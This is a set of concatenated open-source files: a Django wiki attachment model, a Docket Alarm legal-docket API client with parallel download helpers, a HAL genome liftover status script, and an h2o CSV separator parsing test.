get_latest_by = 'revision_number'
# Matches label of upcoming 0.1 release
db_table = 'wiki_attachments_attachmentrevision'
if settings.APP_LABEL:
app_label = settings.APP_LABEL
def get_filename(self):
"""Used to retrieve the filename of a revision.
But attachment.original_filename should always be used in the frontend
such that filenames stay consistent."""
# TODO: Perhaps we can let file names change when files are replaced?
if not self.file:
return None
filename = self.file.name.split("/")[-1]
return ".".join(filename.split(".")[:-1])
def get_size(self):
"""Used to retrieve the file size and not cause exceptions."""
try:
return self.file.size
except OSError:
return None
except ValueError:
return None
def save(self, *args, **kwargs):
if (not self.id and
not self.previous_revision and
self.attachment and
self.attachment.current_revision and
self.attachment.current_revision != self):
self.previous_revision = self.attachment.current_revision
if not self.revision_number:
try:
previous_revision = self.attachment.attachmentrevision_set.latest()
self.revision_number = previous_revision.revision_number + 1
# NB! The above should not raise the below exception, but somehow
# it does.
except AttachmentRevision.DoesNotExist as noattach:
Attachment.DoesNotExist = noattach
self.revision_number = 1
super(AttachmentRevision, self).save(*args, **kwargs)
if not self.attachment.current_revision:
# If I'm saved from Django admin, then article.current_revision is
# me!
self.attachment.current_revision = self
self.attachment.save()
def __str__(self):
return "%s: %s (r%d)" % (self.attachment.article.current_revision.title,
self.attachment.original_filename,
self.revision_number)
def on_revision_delete(instance, *args, **kwargs):
if not instance.file:
return
# Remove file
path = instance.file.path.split("/")[:-1]
instance.file.delete(save=False)
# Clean up empty directories
# Check for empty folders in the path. Delete the first two.
if len(path[-1]) == 32:
# Path was (most likely) obscurified so we should look 2 levels down
max_depth = 2
else:
max_depth = 1
for depth in range(0, max_depth):
delete_path = "/".join(path[:-depth] if depth > 0 else path)
try:
if len(
os.listdir(
os.path.join(
django_settings.MEDIA_ROOT,
delete_path))) == 0:
os.rmdir(delete_path)
except OSError:
# Raised by os.listdir if directory is missing
pass
signals.pre_delete.connect(on_revision_delete, AttachmentRevision)
| gpl-3.0 | 3,964,162,408,002,230,000 | 32.818182 | 104 | 0.619624 | false |
DocketAlarm/pacer-api | api/client.py | 1 | 11985 | import pprint
import base64
import urllib.request, urllib.parse, urllib.error
import urllib.request, urllib.error, urllib.parse
import json
import shelve
__version__ = '1.1'
'''
Docket Alarm Python API Client
Example Usage:
token = call_api("login", "POST", username="[email protected]",
password="pass")
token = token['login_token']
result = call_api("searchpacer", "GET", login_token=token,
client_matter='new search', party_name="Microsoft",
nature_of_suit="830")
'''
################################################################################
# Global API Setings
api = "/api/v1/"
DEBUG = True # View additional debug information
TESTING = False # Automatically turn on testing for all calls.
_INTERNAL_TESTING = False # Used internally
USE_LOCAL = False # For internal development purposes only
# Helpful for command line interaction
PRESS_KEY_BEFORE_CALL = False # Wait for input before making url fetch
PRESS_KEY_AFTER_CALL = False # Wait for input before going to the next step
SEARCH_RESULTS_AT_ONCE = 50 # Results per call when searching in parallel.
TIMEOUT = 120
################################################################################
# The Main API call
def call(call, method="GET", **kwargs):
if method not in ["GET", "POST"]:
raise Exception("Expecting a GET or POST request, not: %s"%method)
if PRESS_KEY_BEFORE_CALL:
input("(press enter to continue)")
# Prepare the URL and arguments
if USE_LOCAL:
base_url = "http://localhost:8080"
else:
base_url = "https://www.docketalarm.com"
url = base_url + api + call + "/"
urlargs = {}
if TESTING:
urlargs['test'] = True
username, password = None, None
if call not in ['login', 'subaccount']:
if 'username' in kwargs:
username = kwargs['username']
del kwargs['username']
if 'password' in kwargs:
password = kwargs['password']
del kwargs['password']
if username and password and kwargs.get('login_token'):
kwargs['login_token'] = ''
# Sort the keywords so they are applied consistently.
sorted_kw = sorted(list(kwargs.items()), key = lambda val: val[0])
urlargs = urllib.parse.urlencode(sorted_kw, doseq=True)
if method == "GET":
url = url + "?" + urlargs
# Allow for debug printing
if DEBUG:
print(("%s: %s"%(method, url)))
if method == "POST":
print(("ARGUMENTS: %s"%pprint.pformat(urlargs)))
# Add an authorization header if provided.
req = urllib.request.Request(url)
if username and password:
        auth = base64.b64encode(('%s:%s' % (username, password)).encode('utf-8')).decode('ascii')
req.add_header("Authorization", "Basic %s" % auth)
# Make the call
if _INTERNAL_TESTING:
out = _INTERNAL_TESTING(method, url, urlargs)
elif method == "GET":
out = urllib.request.urlopen(req, timeout = TIMEOUT).read()
else:
out = urllib.request.urlopen(req, urlargs.encode('UTF-8'), timeout = TIMEOUT).read()
try:
out = json.loads(out)
except:
raise Exception("Not JSON: " + out)
if DEBUG and out and out.get('error'):
print("Error: %s"%out['error'])
if PRESS_KEY_AFTER_CALL:
input("API Call Complete (press enter to continue)")
print("")
return out
################################################################################
# Utilities and Time Saving Helper Functions
import time, logging
from queue import Empty
from multiprocessing import Process
from multiprocessing import Pool as MultiProcessPool
from multiprocessing import Queue as ProcessQueue
def _dl_worker(username, password, client_matter, cached, dlqueue, docketqueue):
'''
A Download worker used by get_dockets to download dockets in parallel.
'''
# Generic login function
login = lambda: call(call="login", method="POST",
username=username, password=password)['login_token']
token, tries = None, 0
while True:
try:
court, docket = dlqueue.get_nowait()
except Empty:
logging.info("Download Queue Done.")
return
except (KeyboardInterrupt, Exception) as e:
logging.info("Worker exception: %s"%e)
return
# Retry handler
for i in range(0, 2):
# Try logging in every so often
try:
if not token or tries % 25 == 0:
token = login()
result = call(call="getdocket", method="GET",
court=court, docket=docket,login_token=token,
client_matter=client_matter, cached=cached)
except Exception as e:
logging.error("Problem accessing %s, %s: %s", court, docket, e)
token = None
tries += 1
result = {'success' : False, 'error':str(e)}
continue
tries += 1
if result and not result.get('success'):
continue
break
# Save the results
docketqueue.put({
'court':court,
'docket':docket,
'result':result,
})
def getdocket_parallel(username, password, client_matter, docket_list,
cached = False, num_workers = 15,
save_progress = None, _async = False):
'''
Download a list of dockets in parallel by launching many processes.
docket_list: A list of (court, docket) tuples
num_workers: How many parallel processes to start
cached: Get cached dockets instead of fresh ones from the court
save_progress Use a temporary file to save work in case we crash.
    _async          If True, we get the data asynchronously.
'''
if save_progress != None:
if _async == True:
raise NotImplementedError("Cannot save progress and async.")
save_progress = shelve.open(save_progress, 'c')
def get_key(court, docket):
return ("(%s),(%s)"%(court, docket)).encode('ascii', 'ignore')
dockets = []
def deb(msg, *args, **kwargs):
msg = "getdocket_parallel %s-%s: %s"%(username, client_matter, msg)
logging.info(msg, *args, **kwargs)
# Put all of the tuples into a processing queue
dlqueue = ProcessQueue()
for c_vals in docket_list:
c_vals = list(c_vals)
if len(c_vals) < 2:
raise Exception("Expecting a list of at least two with court, "
"docket, instead got: %s", c_vals)
court, docket = c_vals[:2]
k = get_key(court, docket)
if save_progress != None and save_progress.get(k) and \
save_progress[k]['result']['success']:
# Add to the results
dockets.append(save_progress[k])
else:
# Add it to the download queue
dlqueue.put((court, docket))
# The processes will put their results into the docketqueue
docketqueue = ProcessQueue()
# The main thread removes them from docketqueue and puts them into a list.
# Start up the parallel processes
pool = MultiProcessPool(processes=num_workers, initializer=_dl_worker,
initargs=[username, password, client_matter,
cached, dlqueue, docketqueue])
def iterator(sleep_time = 1.0):
'''An iterator that goes through all of the given dockets.'''
# Continue until the processing queue is empty
got, iters, total = 0, 0, len(docket_list)
while True:
# It takes about 15 seconds to download a docket, so wait that long.
iters += 1
try:
time.sleep(sleep_time)
# get_nowait will have raise Empty and break the loop
while True:
yield docketqueue.get_nowait()
got += 1
except Empty:
left = total - got
if left <= 0:
deb("Finished iterating %s"%total)
break
if iters % 5 == 0:
deb("Did %d/%d, %d left.", got, total, left)
continue
except KeyboardInterrupt as e:
deb("Main thread interrupt: %s" % e)
break
except Exception as e:
deb("Main thread loop exception: %s" % e)
break
dlqueue.close()
docketqueue.close()
pool.close()
pool.terminate()
if _async:
return iterator
for new_i, new_docket in enumerate(iterator()):
dockets.append(new_docket)
# Only save if succesful
if save_progress != None and new_docket['result']['success']:
# Save our progress
k = get_key(new_docket['court'], new_docket['docket'])
save_progress[k] = new_docket
elif save_progress != None and new_i % 20 ==0:
deb("sync dbase len=%d, added=%d ", len(save_progress), 'got')
save_progress.sync()
# Return what we have even if there was an exception.
if save_progress != None:
save_progress.sync()
save_progress.close()
return dockets
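# Minimal usage sketch for getdocket_parallel (the credentials, court codes and
# docket numbers below are placeholders, not real values):
#
#   dockets = getdocket_parallel(
#       username="user@example.com", password="secret",
#       client_matter="demo matter",
#       docket_list=[("cand", "3:14-cv-01234"), ("nysd", "1:15-cv-05678")],
#       cached=True, num_workers=4)
#   for d in dockets:
#       print(d['court'], d['docket'], d['result'].get('success'))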
################################
def _search_worker(username, password, client_matter, q, inqueue, searchqueue):
# Generic login function
login = lambda: call(call="login", method="POST",
username=username, password=password)['login_token']
token, tries = None, 0
while True:
try:
offset, limit = inqueue.get_nowait()
except Empty:
logging.info("Download Queue Done.")
return
except (KeyboardInterrupt, Exception) as e:
logging.info("Worker exception: %s"%e)
return
# Retry handler
for i in range(0, 2):
# Try logging in every so often
try:
if not token or tries % 25 == 0:
token = login()
result = call(call="search", method="GET", q = q,
offset = offset, limit = limit, o = 'date_filed',
login_token = token, client_matter = client_matter)
except Exception as e:
logging.error("Could not search at %s, tries - %s: %s"%(
offset, tries, e))
tries += 1
continue
tries += 1
if result and not result.get('success'):
logging.warning("Problem getting results: %s"%result)
token = None
continue
break
# Save the results
searchqueue.put({
'offset' : offset,
'limit' : limit,
'result' : result,
})
def search_parallel(username, password, client_matter, q,
num_workers = 15):
'''
Download a list of dockets in parallel by launching many processes.
docket_list: A list of (court, docket) tuples
num_workers: How many parallel processes to start
'''
login_token = call(call="login", method="POST",
username=username, password=password)['login_token']
first_page = call(call="search", method="GET", q=q,
login_token=login_token, client_matter=client_matter)
if 'search_results' not in first_page:
raise Exception("Could not find search results: %s"%first_page)
num_first_page = len(first_page['search_results'])
num_results = first_page['count']
# The main thread removes them from searchqueue and puts them into a list.
results = [None]*num_results
results[:num_first_page] = first_page['search_results']
logging.info("Downloading %s Results, already got first %d"%(
num_results, num_first_page))
# Put all of the search ranges into the result queue
dlqueue = ProcessQueue()
for i in range(num_first_page, num_results, SEARCH_RESULTS_AT_ONCE):
limit = min(num_results, i+SEARCH_RESULTS_AT_ONCE) - i
logging.info("Added: %s --> %s"%(i, i+limit))
dlqueue.put((i, limit))
# The processes will put their results into the searchqueue
searchqueue = ProcessQueue()
# Start up the parallel processes
pool = MultiProcessPool(processes=num_workers, initializer=_search_worker,
initargs=[username, password, client_matter, q,
dlqueue, searchqueue])
try:
# Continue until the processing queue is empty.
while True:
# It takes about 15 seconds to download a docket, so wait that long.
time.sleep(2.0 / num_workers)
got = 0
try:
item = searchqueue.get_nowait()
start, end = item['offset'], item['offset']+item['limit']
results[start:end] = item['result']['search_results']
logging.info("Downloaded: %s --> %s (of %d total)"%(
start, end, num_results))
got += 1
except Empty:
left = len(results) - len([_f for _f in results if _f])
if left <= 0:
break
logging.info("Got %d, %d results. Waiting for %d more."%(
got, len(results), left))
continue
except Exception as e:
logging.info("Main thread loop exception: %s"%e)
break
except KeyboardInterrupt as e:
logging.info("Main thread exception: %s"%e)
dlqueue.close()
searchqueue.close()
pool.close()
pool.terminate()
# Return what we have even if there was an exception.
return results
for i, r in enumerate(results):
if not r:
print("Missing Result %s"%(i+1))
return {
'search_results' : results,
'count' : num_results,
}
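# Usage sketch for search_parallel (credentials and query string are placeholders;
# consult the Docket Alarm API documentation for real query syntax):
#
#   res = search_parallel("user@example.com", "secret", "demo matter",
#                         q="microsoft", num_workers=10)
#   print(res['count'], len(res['search_results']))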
| apache-2.0 | -458,155,346,470,452,860 | 29.733333 | 86 | 0.651481 | false |
glennhickey/hal | liftover/halLiftoverStatus.py | 1 | 20969 | #!/usr/bin/env python3
#Copyright (C) 2013 by Ngan Nguyen ([email protected])
# Copyright (C) 2012-2019 by UCSC Computational Genomics Lab
#
#Released under the MIT license, see LICENSE.txt
'''
Check liftover status
Input: bed_file (1 entry per element, e.g 1 line per gene)
hal_file
query_name
target_name
out_file
Output: print to out_file tab separated fields checking how each line
of bed_file maps to the target, including fields:
<length>: number of bases of the original region in the bed_file
e.g for gene, it's the # non-intronic bases
<mapped>: proportion of length that mapped to the target genome
<rearrangement>: yes/no
<in_frame>: yes/no
<insertions>: list out the insertions
<deletions>: list out the deletions
'''
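# The resulting out_file is tab separated with a header line written by PrintResults,
# e.g. (values are illustrative):
#
#   #Name   Length  Map     Ins     Dels    OO      Inframe
#   geneA   1452    1440    12      3,6     False   True
#
# Unmapped entries get Map = 0, empty Ins/Dels, and NA for the OO and Inframe columns.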
import os
import sys
from optparse import OptionParser
from sets import Set
from sonLib.bioio import system
from jobTree.scriptTree.target import Target
from jobTree.scriptTree.stack import Stack
class Status():
def __init__(self, name):
self.name = name
self.length = -1
self.map = 0
self.ins = []
self.dels = []
self.oo = False
self.inframe = True
class Psl():
'''Psl record
'''
def __init__(self, line):
items = line.strip().split('\t')
if len(items) != 21:
raise ValueError("Psl format requires 21 fields, line \n%s\n only has %d fields.\n" %(line, len(items)))
self.desc = line
self.matches = int(items[0])
self.misMatches = int(items[1])
self.repMatches = int(items[2])
self.nCount = int(items[3])
self.qNumInsert = int(items[4])
self.qBaseInsert = int(items[5]) # number of bases inserted in query
self.tNumInsert = int(items[6]) # number of inserts in target
self.tBaseInsert = int(items[7]) #number of bases inserted in target
self.strand = items[8] # query strand
self.qName = items[9]
self.qSize = int(items[10])
self.qStart = int(items[11]) #base 0
self.qEnd = int(items[12])
self.tName = items[13]
self.tSize = int(items[14])
self.tStart = int(items[15])
self.tEnd = int(items[16])
self.blockCount = int(items[17])
self.blockSizes = [int(s) for s in items[18].rstrip(',').split(',')]
self.qStarts = [int(s) for s in items[19].rstrip(',').split(',')]
self.tStarts = [int(s) for s in items[20].rstrip(',').split(',')]
if len(self.blockSizes) != self.blockCount or len(self.qStarts) != self.blockCount or len(self.tStarts) != self.blockCount:
raise ValueError("Psl format requires that the number of items in blockSizes, qStarts, tStarts is equal to blockCount. Line: %s\n" %line)
def __cmp__(self, other): # compare by query coordinate
if self.qName != other.qName:
return cmp(self.qName, other.qName)
elif self.qStart != other.qStart:
return cmp(self.qStart, other.qStart)
else:
return cmp(self.qEnd, other.qEnd)
class Bed():
'''Bed record
'''
def __init__(self, line):
items = line.strip().split('\t')
if len(items) < 3:
raise BedFormatError(("Bed format for this program requires a " +
"minimum of 3 fields, line \n%s\n only has %d fields.\n" %
(line, len(items))))
#self.chr = items[0]
self.chr = items[0].split('.')[-1]
try:
self.start = int(items[1]) # base 0
self.end = int(items[2]) # exclusive
except ValueError:
print("BED %s has wrong format\n" % line)
self.name = ''
if len(items) > 3:
self.name = items[3]
if len(items) >= 12:
self.score = items[4]
self.strand = items[5]
assert self.strand == '-' or self.strand == '+'
self.thickStart = int(items[6]) # base 0
self.thickEnd = int(items[7])
self.itemRgb = items[8]
self.blockCount = int(items[9])
self.blockSizes = [int(i) for i in items[10].rstrip(',').split(',')]
self.blockStarts = [int(i) for i in items[11].rstrip(',').split(',')]
assert len(self.blockSizes) == self.blockCount
assert len(self.blockStarts) == self.blockCount
#if blockStarts[0] != 0, convert start & end so that blockStarts[0] = 0
if (len(self.blockStarts) > 0 and
(self.blockStarts[0] != 0 or
self.end != self.start + self.blockStarts[-1] + self.blockSizes[-1])):
offset = self.blockStarts[0]
self.start += offset
self.blockStarts = [s - offset for s in self.blockStarts]
self.end = self.start + self.blockStarts[-1] + self.blockSizes[-1]
else:
self.score = '.'
self.strand = '.'
self.thickStart = self.start
self.thickEnd = self.end
self.itemRgb = '.'
if len(items) >= 10:
self.blockCount = int(items[9])
else:
self.blockCount = 1
self.blockSizes = [self.end - self.start]
self.blockStarts = [0]
def __cmp__(self, other):
if self.chr != other.chr:
return cmp(self.chr, other.chr)
elif self.start != other.start:
return cmp(self.start, other.start)
else:
return cmp(self.end, other.end)
def getStr(self):
blockSizes = ','.join([str(s) for s in self.blockSizes])
blockStarts = ','.join([str(s) for s in self.blockStarts])
return "%s\t%d\t%d\t%s\t%s\t%s\t%d\t%d\t%s\t%d\t%s\t%s" \
%(self.chr, self.start, self.end, self.name, self.score,\
self.strand, self.thickStart, self.thickEnd, self.itemRgb,\
self.blockCount, blockSizes, blockStarts)
def get_bed(file):
f = open(file, 'r')
lines = f.readlines()
assert len(lines) == 1
bed = Bed(lines[0])
f.close()
return bed
def psl_pos_target(psl):
# make sure the target is on the positive strand
if len(psl.strand) != 2 or psl.strand[1] != '-':
return psl
rvstrand = {'-': '+', '+': '-'}
psl.strand = rvstrand[psl.strand[0]] + rvstrand[psl.strand[1]]
sizes = []
qstarts = []
tstarts = []
for i in range(psl.blockCount - 1, -1, -1):
size = psl.blockSizes[i]
qs = psl.qSize - (psl.qStarts[i] + size)
ts = psl.tSize - (psl.tStarts[i] + size)
sizes.append(size)
qstarts.append(qs)
tstarts.append(ts)
psl.blockSizes = sizes
psl.qStarts = qstarts
psl.tStarts = tstarts
return psl
def get_psls(file):
psls = []
f = open(file, 'r')
for line in f:
psl = Psl(line)
psl = psl_pos_target(psl)
psls.append(psl)
f.close()
return psls
def psl_getPosCoords(psl):
    # This function reverses the psl if the query strand is -, to make sure that the query strand is always +
# make sure that the target strand of INPUT psl is always on the + strand
assert len(psl.strand) < 2 or psl.strand[1] != '-'
strand = psl.strand
if psl.strand[0] == '-':
qstarts = []
tstarts = []
sizes = []
for i in range(psl.blockCount - 1, -1, -1):
qstart = psl.qSize - (psl.qStarts[i] + psl.blockSizes[i])
tstart = psl.tSize - (psl.tStarts[i] + psl.blockSizes[i])
qstarts.append(qstart)
tstarts.append(tstart)
sizes.append(psl.blockSizes[i])
qstrand = '+'
if len(psl.strand) == 2 and psl.strand[1] == '-':
tstrand = '+'
else:
tstrand = '-'
strand = qstrand + tstrand
else:
qstarts = psl.qStarts
tstarts = psl.tStarts
sizes = psl.blockSizes
return qstarts, tstarts, sizes, strand
def psl_check_query_overlap(psl1, psl2):
    # return the number of query bases of psl1 that overlap the query ranges of psl2 (0 if no overlap)
overlap = 0
if (psl1.qName != psl2.qName or psl1.qEnd <= psl2.qStart or
psl2.qEnd <= psl1.qStart): # not overlap
return overlap
# Convert query coordinates of both psls to query + strand
starts1, tstarts1, sizes1, strand1 = psl_getPosCoords(psl1)
starts2, tstarts2, sizes2, strand2 = psl_getPosCoords(psl2)
# Check each block:
for i1, start1 in enumerate(starts1):
end1 = start1 + sizes1[i1]
for i2, start2 in enumerate(starts2):
end2 = start2 + sizes2[i2]
if start2 < end1 and start1 < end2: # overlap
ostart = max(start1, start2)
oend = min(end1, end2)
overlap += (oend - ostart)
return overlap
def get_next_non_overlap_psl(sets, sorted_psls):
new_sets = [] # list of lists, each elment = ([], lastindex)
# each set is represented as list of indices of the psls in that list
for curr_set in sets:
psl_indices = curr_set[0]
i = curr_set[1] # current index
added = 0
for j in range(i + 1, len(sorted_psls)):
psl = sorted_psls[j]
overlap = False
for index in psl_indices:
psl0 = sorted_psls[index]
if psl_check_query_overlap(psl, psl0) > 0:
overlap = True
break
if not overlap: # current psl does not overlap with any element
added += 1
new_set = (psl_indices + [j], j)
curr_new_sets = get_next_non_overlap_psl([new_set], sorted_psls)
new_sets = new_sets + curr_new_sets
if added == 0: # no additional non-overlap psl found
new_set = (psl_indices, len(sorted_psls))
new_sets.append(new_set)
return new_sets
def get_non_overlap_psls_sets(psls):
# some bases in the query bed map to multiple positions on the target
    # this function returns all possible sets of psls in which each query base
    # appears at most once
sets = []
for i in range(len(psls)): # each psl as a starting element
start_set = ([i], i)
curr_sets = get_next_non_overlap_psl([start_set], psls)
for s in curr_sets: # make sure added set is not a subset of existing ones
curr_set = Set(s[0])
issubset = False
for s0 in sets:
set0 = Set(s0)
if curr_set.issubset(set0):
issubset = True
break
if not issubset:
sets.append(s[0])
return sets
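# Small worked example of the indices this returns (hypothetical psls): if, among
# three sorted psls, psl 0 and psl 1 overlap each other on the query while psl 2
# overlaps neither, the maximal non-overlapping sets are
#
#   >>> get_non_overlap_psls_sets([pslA, pslB, pslC])
#   [[0, 2], [1, 2]]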
def psls_get_qcov(psls):
return sum([sum(psl.blockSizes) for psl in psls])
def get_most_qcov(pslsets, sorted_psls):
# return the psl set with highest query coverage
if not pslsets:
return None
most_qcov_set = None
qcov = 0
for pslset in pslsets:
currcov = psls_get_qcov([sorted_psls[i] for i in pslset])
if currcov > qcov:
qcov = currcov
most_qcov_set = pslset
return most_qcov_set, qcov
class Reg:
def __init__(self, name, start, end, strand, size, qstart, qend):
self.name = name
self.start = start
self.end = end
self.strand = strand
self.size = size
self.qstart = qstart
self.qend = qend
def psl_get_tpos(qstarts, tstarts, sizes, qpos):
for i, qs in enumerate(qstarts):
size = sizes[i]
qe = qs + size
if qs <= qpos and qpos <= qe:
offset = qpos - qs
ts = tstarts[i]
return ts + offset
return -1
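# Worked example for psl_get_tpos (coordinates are made up): with
# qstarts=[0, 100], tstarts=[50, 500], sizes=[10, 20], a query position of 105
# falls in the second block at offset 5, so the target position is 500 + 5 = 505;
# a query position of 30 is in no block and returns -1.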
def block_status(indices, sorted_psls, start, end, edge):
ins = []
dels = []
oo = False
tregs = []
tstart = -1
tend = -1
tname = ''
pos = start
blocksize = end - start
assert blocksize > 0
for index in indices:
psl = sorted_psls[index]
qstarts, tstarts, sizes, strand = psl_getPosCoords(psl)
for i, qstart in enumerate(qstarts):
qend = qstart + sizes[i]
if qend < pos:
continue
elif end < qstart:
break
else:
oqstart = max(pos, qstart)
oqend = min(end, qend)
otstart = psl_get_tpos(qstarts, tstarts, sizes, oqstart)
otend = psl_get_tpos(qstarts, tstarts, sizes, oqend)
if strand[1] == '-':
temp = otstart
otstart = psl.tSize - otend
otend = psl.tSize - temp
assert otend >= otstart
#if otend < otstart:
# temp = otstart
# otstart = otend
# otend = otstart
treg = Reg(psl.tName, otstart, otend, strand[1], psl.tSize, oqstart, oqend)
tregs.append(treg)
if float(oqstart - start)/blocksize > edge:
deletion = oqstart - pos
if deletion > 0:
dels.append(deletion)
pos = oqend
if float(end - pos)/blocksize > edge:
if pos < end:
dels.append(end - pos)
# checking for insertions:
if len(tregs) > 1:
for i in range(1, len(tregs)):
if float(treg.qstart - start)/blocksize <= edge or float(end - treg.qend)/blocksize <= edge:
continue
prev_treg = tregs[i - 1]
treg = tregs[i]
if treg.name == prev_treg.name:
if treg.strand == prev_treg.strand:
if treg.strand == '+':
if prev_treg.end < treg.start:
insertion = treg.start - prev_treg.end
ins.append(insertion)
elif prev_treg.end > treg.start:
oo = True
else:
if treg.end < prev_treg.start:
insertion = prev_treg.start - treg.end
ins.append(insertion)
elif treg.end > prev_treg.start:
oo = True
else:
oo = True
else: # map to different chromosome
oo = True
strands = [treg.strand for treg in tregs]
if len(tregs) > 0:
tstart = min([treg.start for treg in tregs])
tend = max([treg.end for treg in tregs])
tname = tregs[0].name
return ins, dels, oo, strands, tstart, tend, tname
def flipbed(bed):
bed.blockSizes.reverse()
bed.blockStarts.reverse()
return bed
def get_liftover_status(bedfile, liftfile, edge):
# return a status object
bed = get_bed(bedfile)
psls = get_psls(liftfile)
status = Status(bed.name)
# get length:
l = sum(bed.blockSizes)
status.length = l
    # get all possible mapping scenarios (all sets of psls where each query base is unique)
sorted_psls = sorted(psls)
pslsets = get_non_overlap_psls_sets(sorted_psls)
if not pslsets:
return status
most_qcov_set, map = get_most_qcov(pslsets, sorted_psls)
# map, insertions, deletions, oo, inframe
status.map = map
ins = []
dels = []
currstrand = ''
currtstart = -1
currtend = -1
currtname = ''
for i, start in enumerate(bed.blockStarts): # each block
qstart = bed.start + start
qend = qstart + bed.blockSizes[i]
block_ins, block_dels, block_oo, strands, tstart, tend, tname = block_status(most_qcov_set, sorted_psls, qstart, qend, edge)
ins.extend(block_ins)
dels.extend(block_dels)
if block_oo:
status.oo = True
elif strands: # check with previous block
tstrand = strands[0]
if currstrand: # not first block
if currstrand != tstrand and not status.oo: # change orientation
status.oo = True
elif currtname and tname and tname != currtname and not status.oo:
status.oo = True
else: #check for change in blocks' order
if ((tstrand == '+' and currtend > tstart) or
(tstrand == '-' and currtstart < tend)):
status.oo = True
currstrand = tstrand
if tstart > -1 and tend > -1:
currtstart = tstart
currtend = tend
currtname = tname
status.ins = ins
status.dels = dels
if status.oo or abs(sum(ins) - sum(dels)) % 3 > 0:
status.inframe = False
return status
def print_status(status, outfile):
ins = ",".join([str(i) for i in status.ins])
dels = ",".join([str(i) for i in status.dels])
f = open(outfile, 'w')
if status.map > 0:
f.write("%s\t%d\t%d\t%s\t%s\t%s\t%s\n" % (status.name, status.length,
status.map, ins, dels, str(status.oo), str(status.inframe)))
else:
f.write("%s\t%d\t%d\t%s\t%s\tNA\tNA\n" % (status.name, status.length,
status.map, ins, dels))
f.close()
def splitfile(file, outdir):
f = open(file, 'r')
i = 0
for line in f:
i += 1
outfile = os.path.join(outdir, "%d.bed" % i)
ofh = open(outfile, 'w')
ofh.write(line)
ofh.close()
f.close()
class Setup(Target):
def __init__(self, options):
Target.__init__(self)
self.opts = options
def run(self):
#Split bed file into separate entries
global_dir = self.getGlobalTempDir()
beddir = os.path.join(global_dir, "single_beds")
system("mkdir -p %s" % beddir)
splitfile(self.opts.bedfile, beddir)
#For each bed, lift-over to the target genome, and report status
liftoverdir = os.path.join(global_dir, "liftover")
system("mkdir -p %s" % liftoverdir)
outdir = os.path.join(global_dir, "out")
system("mkdir -p %s" % outdir)
for bedfile in os.listdir(beddir):
bedpath = os.path.join(beddir, bedfile)
liftoverfile = os.path.join(liftoverdir, bedfile)
outfile = os.path.join(outdir, os.path.splitext(bedfile)[0])
self.addChildTarget(LiftoverAndStatus(bedpath, liftoverfile,
outfile, self.opts))
self.setFollowOnTarget(PrintResults(outdir, self.opts.outfile))
class PrintResults(Target):
def __init__(self, indir, outfile):
Target.__init__(self)
self.indir = indir
self.outfile = outfile
def run(self):
f = open(self.outfile, 'w')
f.write("#Name\tLength\tMap\tIns\tDels\tOO\tInframe\n")
f.close()
system("cat %s/* >> %s" % (self.indir, self.outfile))
class LiftoverAndStatus(Target):
def __init__(self, bedfile, liftoverfile, statusfile, opts):
Target.__init__(self)
self.bedfile = bedfile
self.liftfile = liftoverfile
self.statusfile = statusfile
self.opts = opts
def run(self):
cmd = "halLiftover --outPSL --tab %s %s %s %s %s" % (self.opts.halfile,
self.opts.query, self.bedfile, self.opts.target, self.liftfile)
system(cmd)
#system("cp %s %s_liftoverpsl" % (self.liftfile, self.opts.outfile))
status = get_liftover_status(self.bedfile, self.liftfile, self.opts.edge)
print_status(status, self.statusfile)
def addOptions(parser):
parser.add_option('--edge', dest='edge', default=0.0,
help='proportion of block at each edge that is allowed to have errors')
def checkOptions(parser, args, options):
if len(args) < 5:
parser.error("Need 5 input arguments, only %d was given." % len(args))
options.bedfile = args[0]
if not os.path.exists(options.bedfile):
parser.error("Input bed file %s does not exist." % options.bedfile)
options.halfile = args[1]
if not os.path.exists(options.halfile):
parser.error("Input hal file %s does not exist." % options.halfile)
options.query = args[2]
options.target = args[3]
options.outfile = args[4]
def main():
usage = "%prog <bed_file> <hal_file> <query_name> <target_name> <out_file>"
parser = OptionParser(usage=usage)
addOptions(parser)
Stack.addJobTreeOptions(parser)
options, args = parser.parse_args()
checkOptions(parser, args, options)
i = Stack(Setup(options)).startJobTree(options)
if i:
raise RuntimeError("The jobtree contains %d failed jobs.\n" % i)
if __name__ == '__main__':
from halLiftoverStatus import *
main()
| mit | -4,100,937,656,637,816,300 | 35.091222 | 149 | 0.549049 | false |
spennihana/h2o-3 | h2o-py/tests/testdir_parser/pyunit_separator.py | 6 | 4116 | from builtins import str
import sys
sys.path.insert(1,"../../")
import h2o
from tests import pyunit_utils
def separator_test():
"""Test parsing of csv files having different separator characters."""
# Test tab separated files by giving separator argument
path_tab = "smalldata/parser/tabs.tsv"
tab_test = h2o.import_file(path=pyunit_utils.locate(path_tab), destination_frame="tab_hex", sep="\t")
assert tab_test.nrow == 3, "Error: Number of rows are not correct.{0}".format(str(tab_test.nrow))
assert tab_test.ncol == 3, "Error: Number of columns are not correct.{0}".format(str(tab_test.ncol))
# Test tab separated files by giving NO separator argument
tab_test_noarg = h2o.import_file(path=pyunit_utils.locate(path_tab), destination_frame="tab_hex")
assert tab_test_noarg.nrow == 3, "Error: Number of rows are not correct.{0}".format(str(tab_test_noarg.nrow))
assert tab_test_noarg.ncol == 3, "Error: Number of columns are not correct.{0}".format(str(tab_test_noarg.ncol))
# Test pipe separated files by giving separator
path_pipe = "smalldata/parser/pipes.psv"
pipe_test = h2o.import_file(path=pyunit_utils.locate(path_pipe), destination_frame="pipe_hex", sep="|")
assert pipe_test.nrow == 3, "Error: Number of rows are not correct.{0}".format(str(pipe_test.nrow))
assert pipe_test.ncol == 3, "Error: Number of columns are not correct.{0}".format(str(pipe_test.ncol))
# Test pipe separated files by giving NO separator argument
pipe_test_noarg = h2o.import_file(path=pyunit_utils.locate(path_pipe), destination_frame="pipe_hex")
assert pipe_test_noarg.nrow == 3, "Error: Number of rows are not correct.{0}".format(str(pipe_test_noarg.nrow))
assert pipe_test_noarg.ncol == 3, "Error: Number of columns are not correct.{0}".format(str(pipe_test_noarg.ncol))
# Test hive files by giving separator
path_hive = "smalldata/parser/test.hive"
hive_test = h2o.import_file(path=pyunit_utils.locate(path_hive), destination_frame="hive_hex", sep="\001")
assert hive_test.nrow == 3, "Error: Number of rows are not correct.{0}".format(str(hive_test.nrow))
assert hive_test.ncol == 3, "Error: Number of columns are not correct.{0}".format(str(hive_test.ncol))
# Test hive separated files by giving NO separator argument
hive_test_noarg = h2o.import_file(path=pyunit_utils.locate(path_hive), destination_frame="hive_hex")
assert hive_test_noarg.nrow == 3, "Error: Number of rows are not correct.{0}".format(str(hive_test_noarg.nrow))
assert hive_test_noarg.ncol == 3, "Error: Number of columns are not correct.{0}".format(str(hive_test_noarg.ncol))
# Test semi colon separated files by giving separator
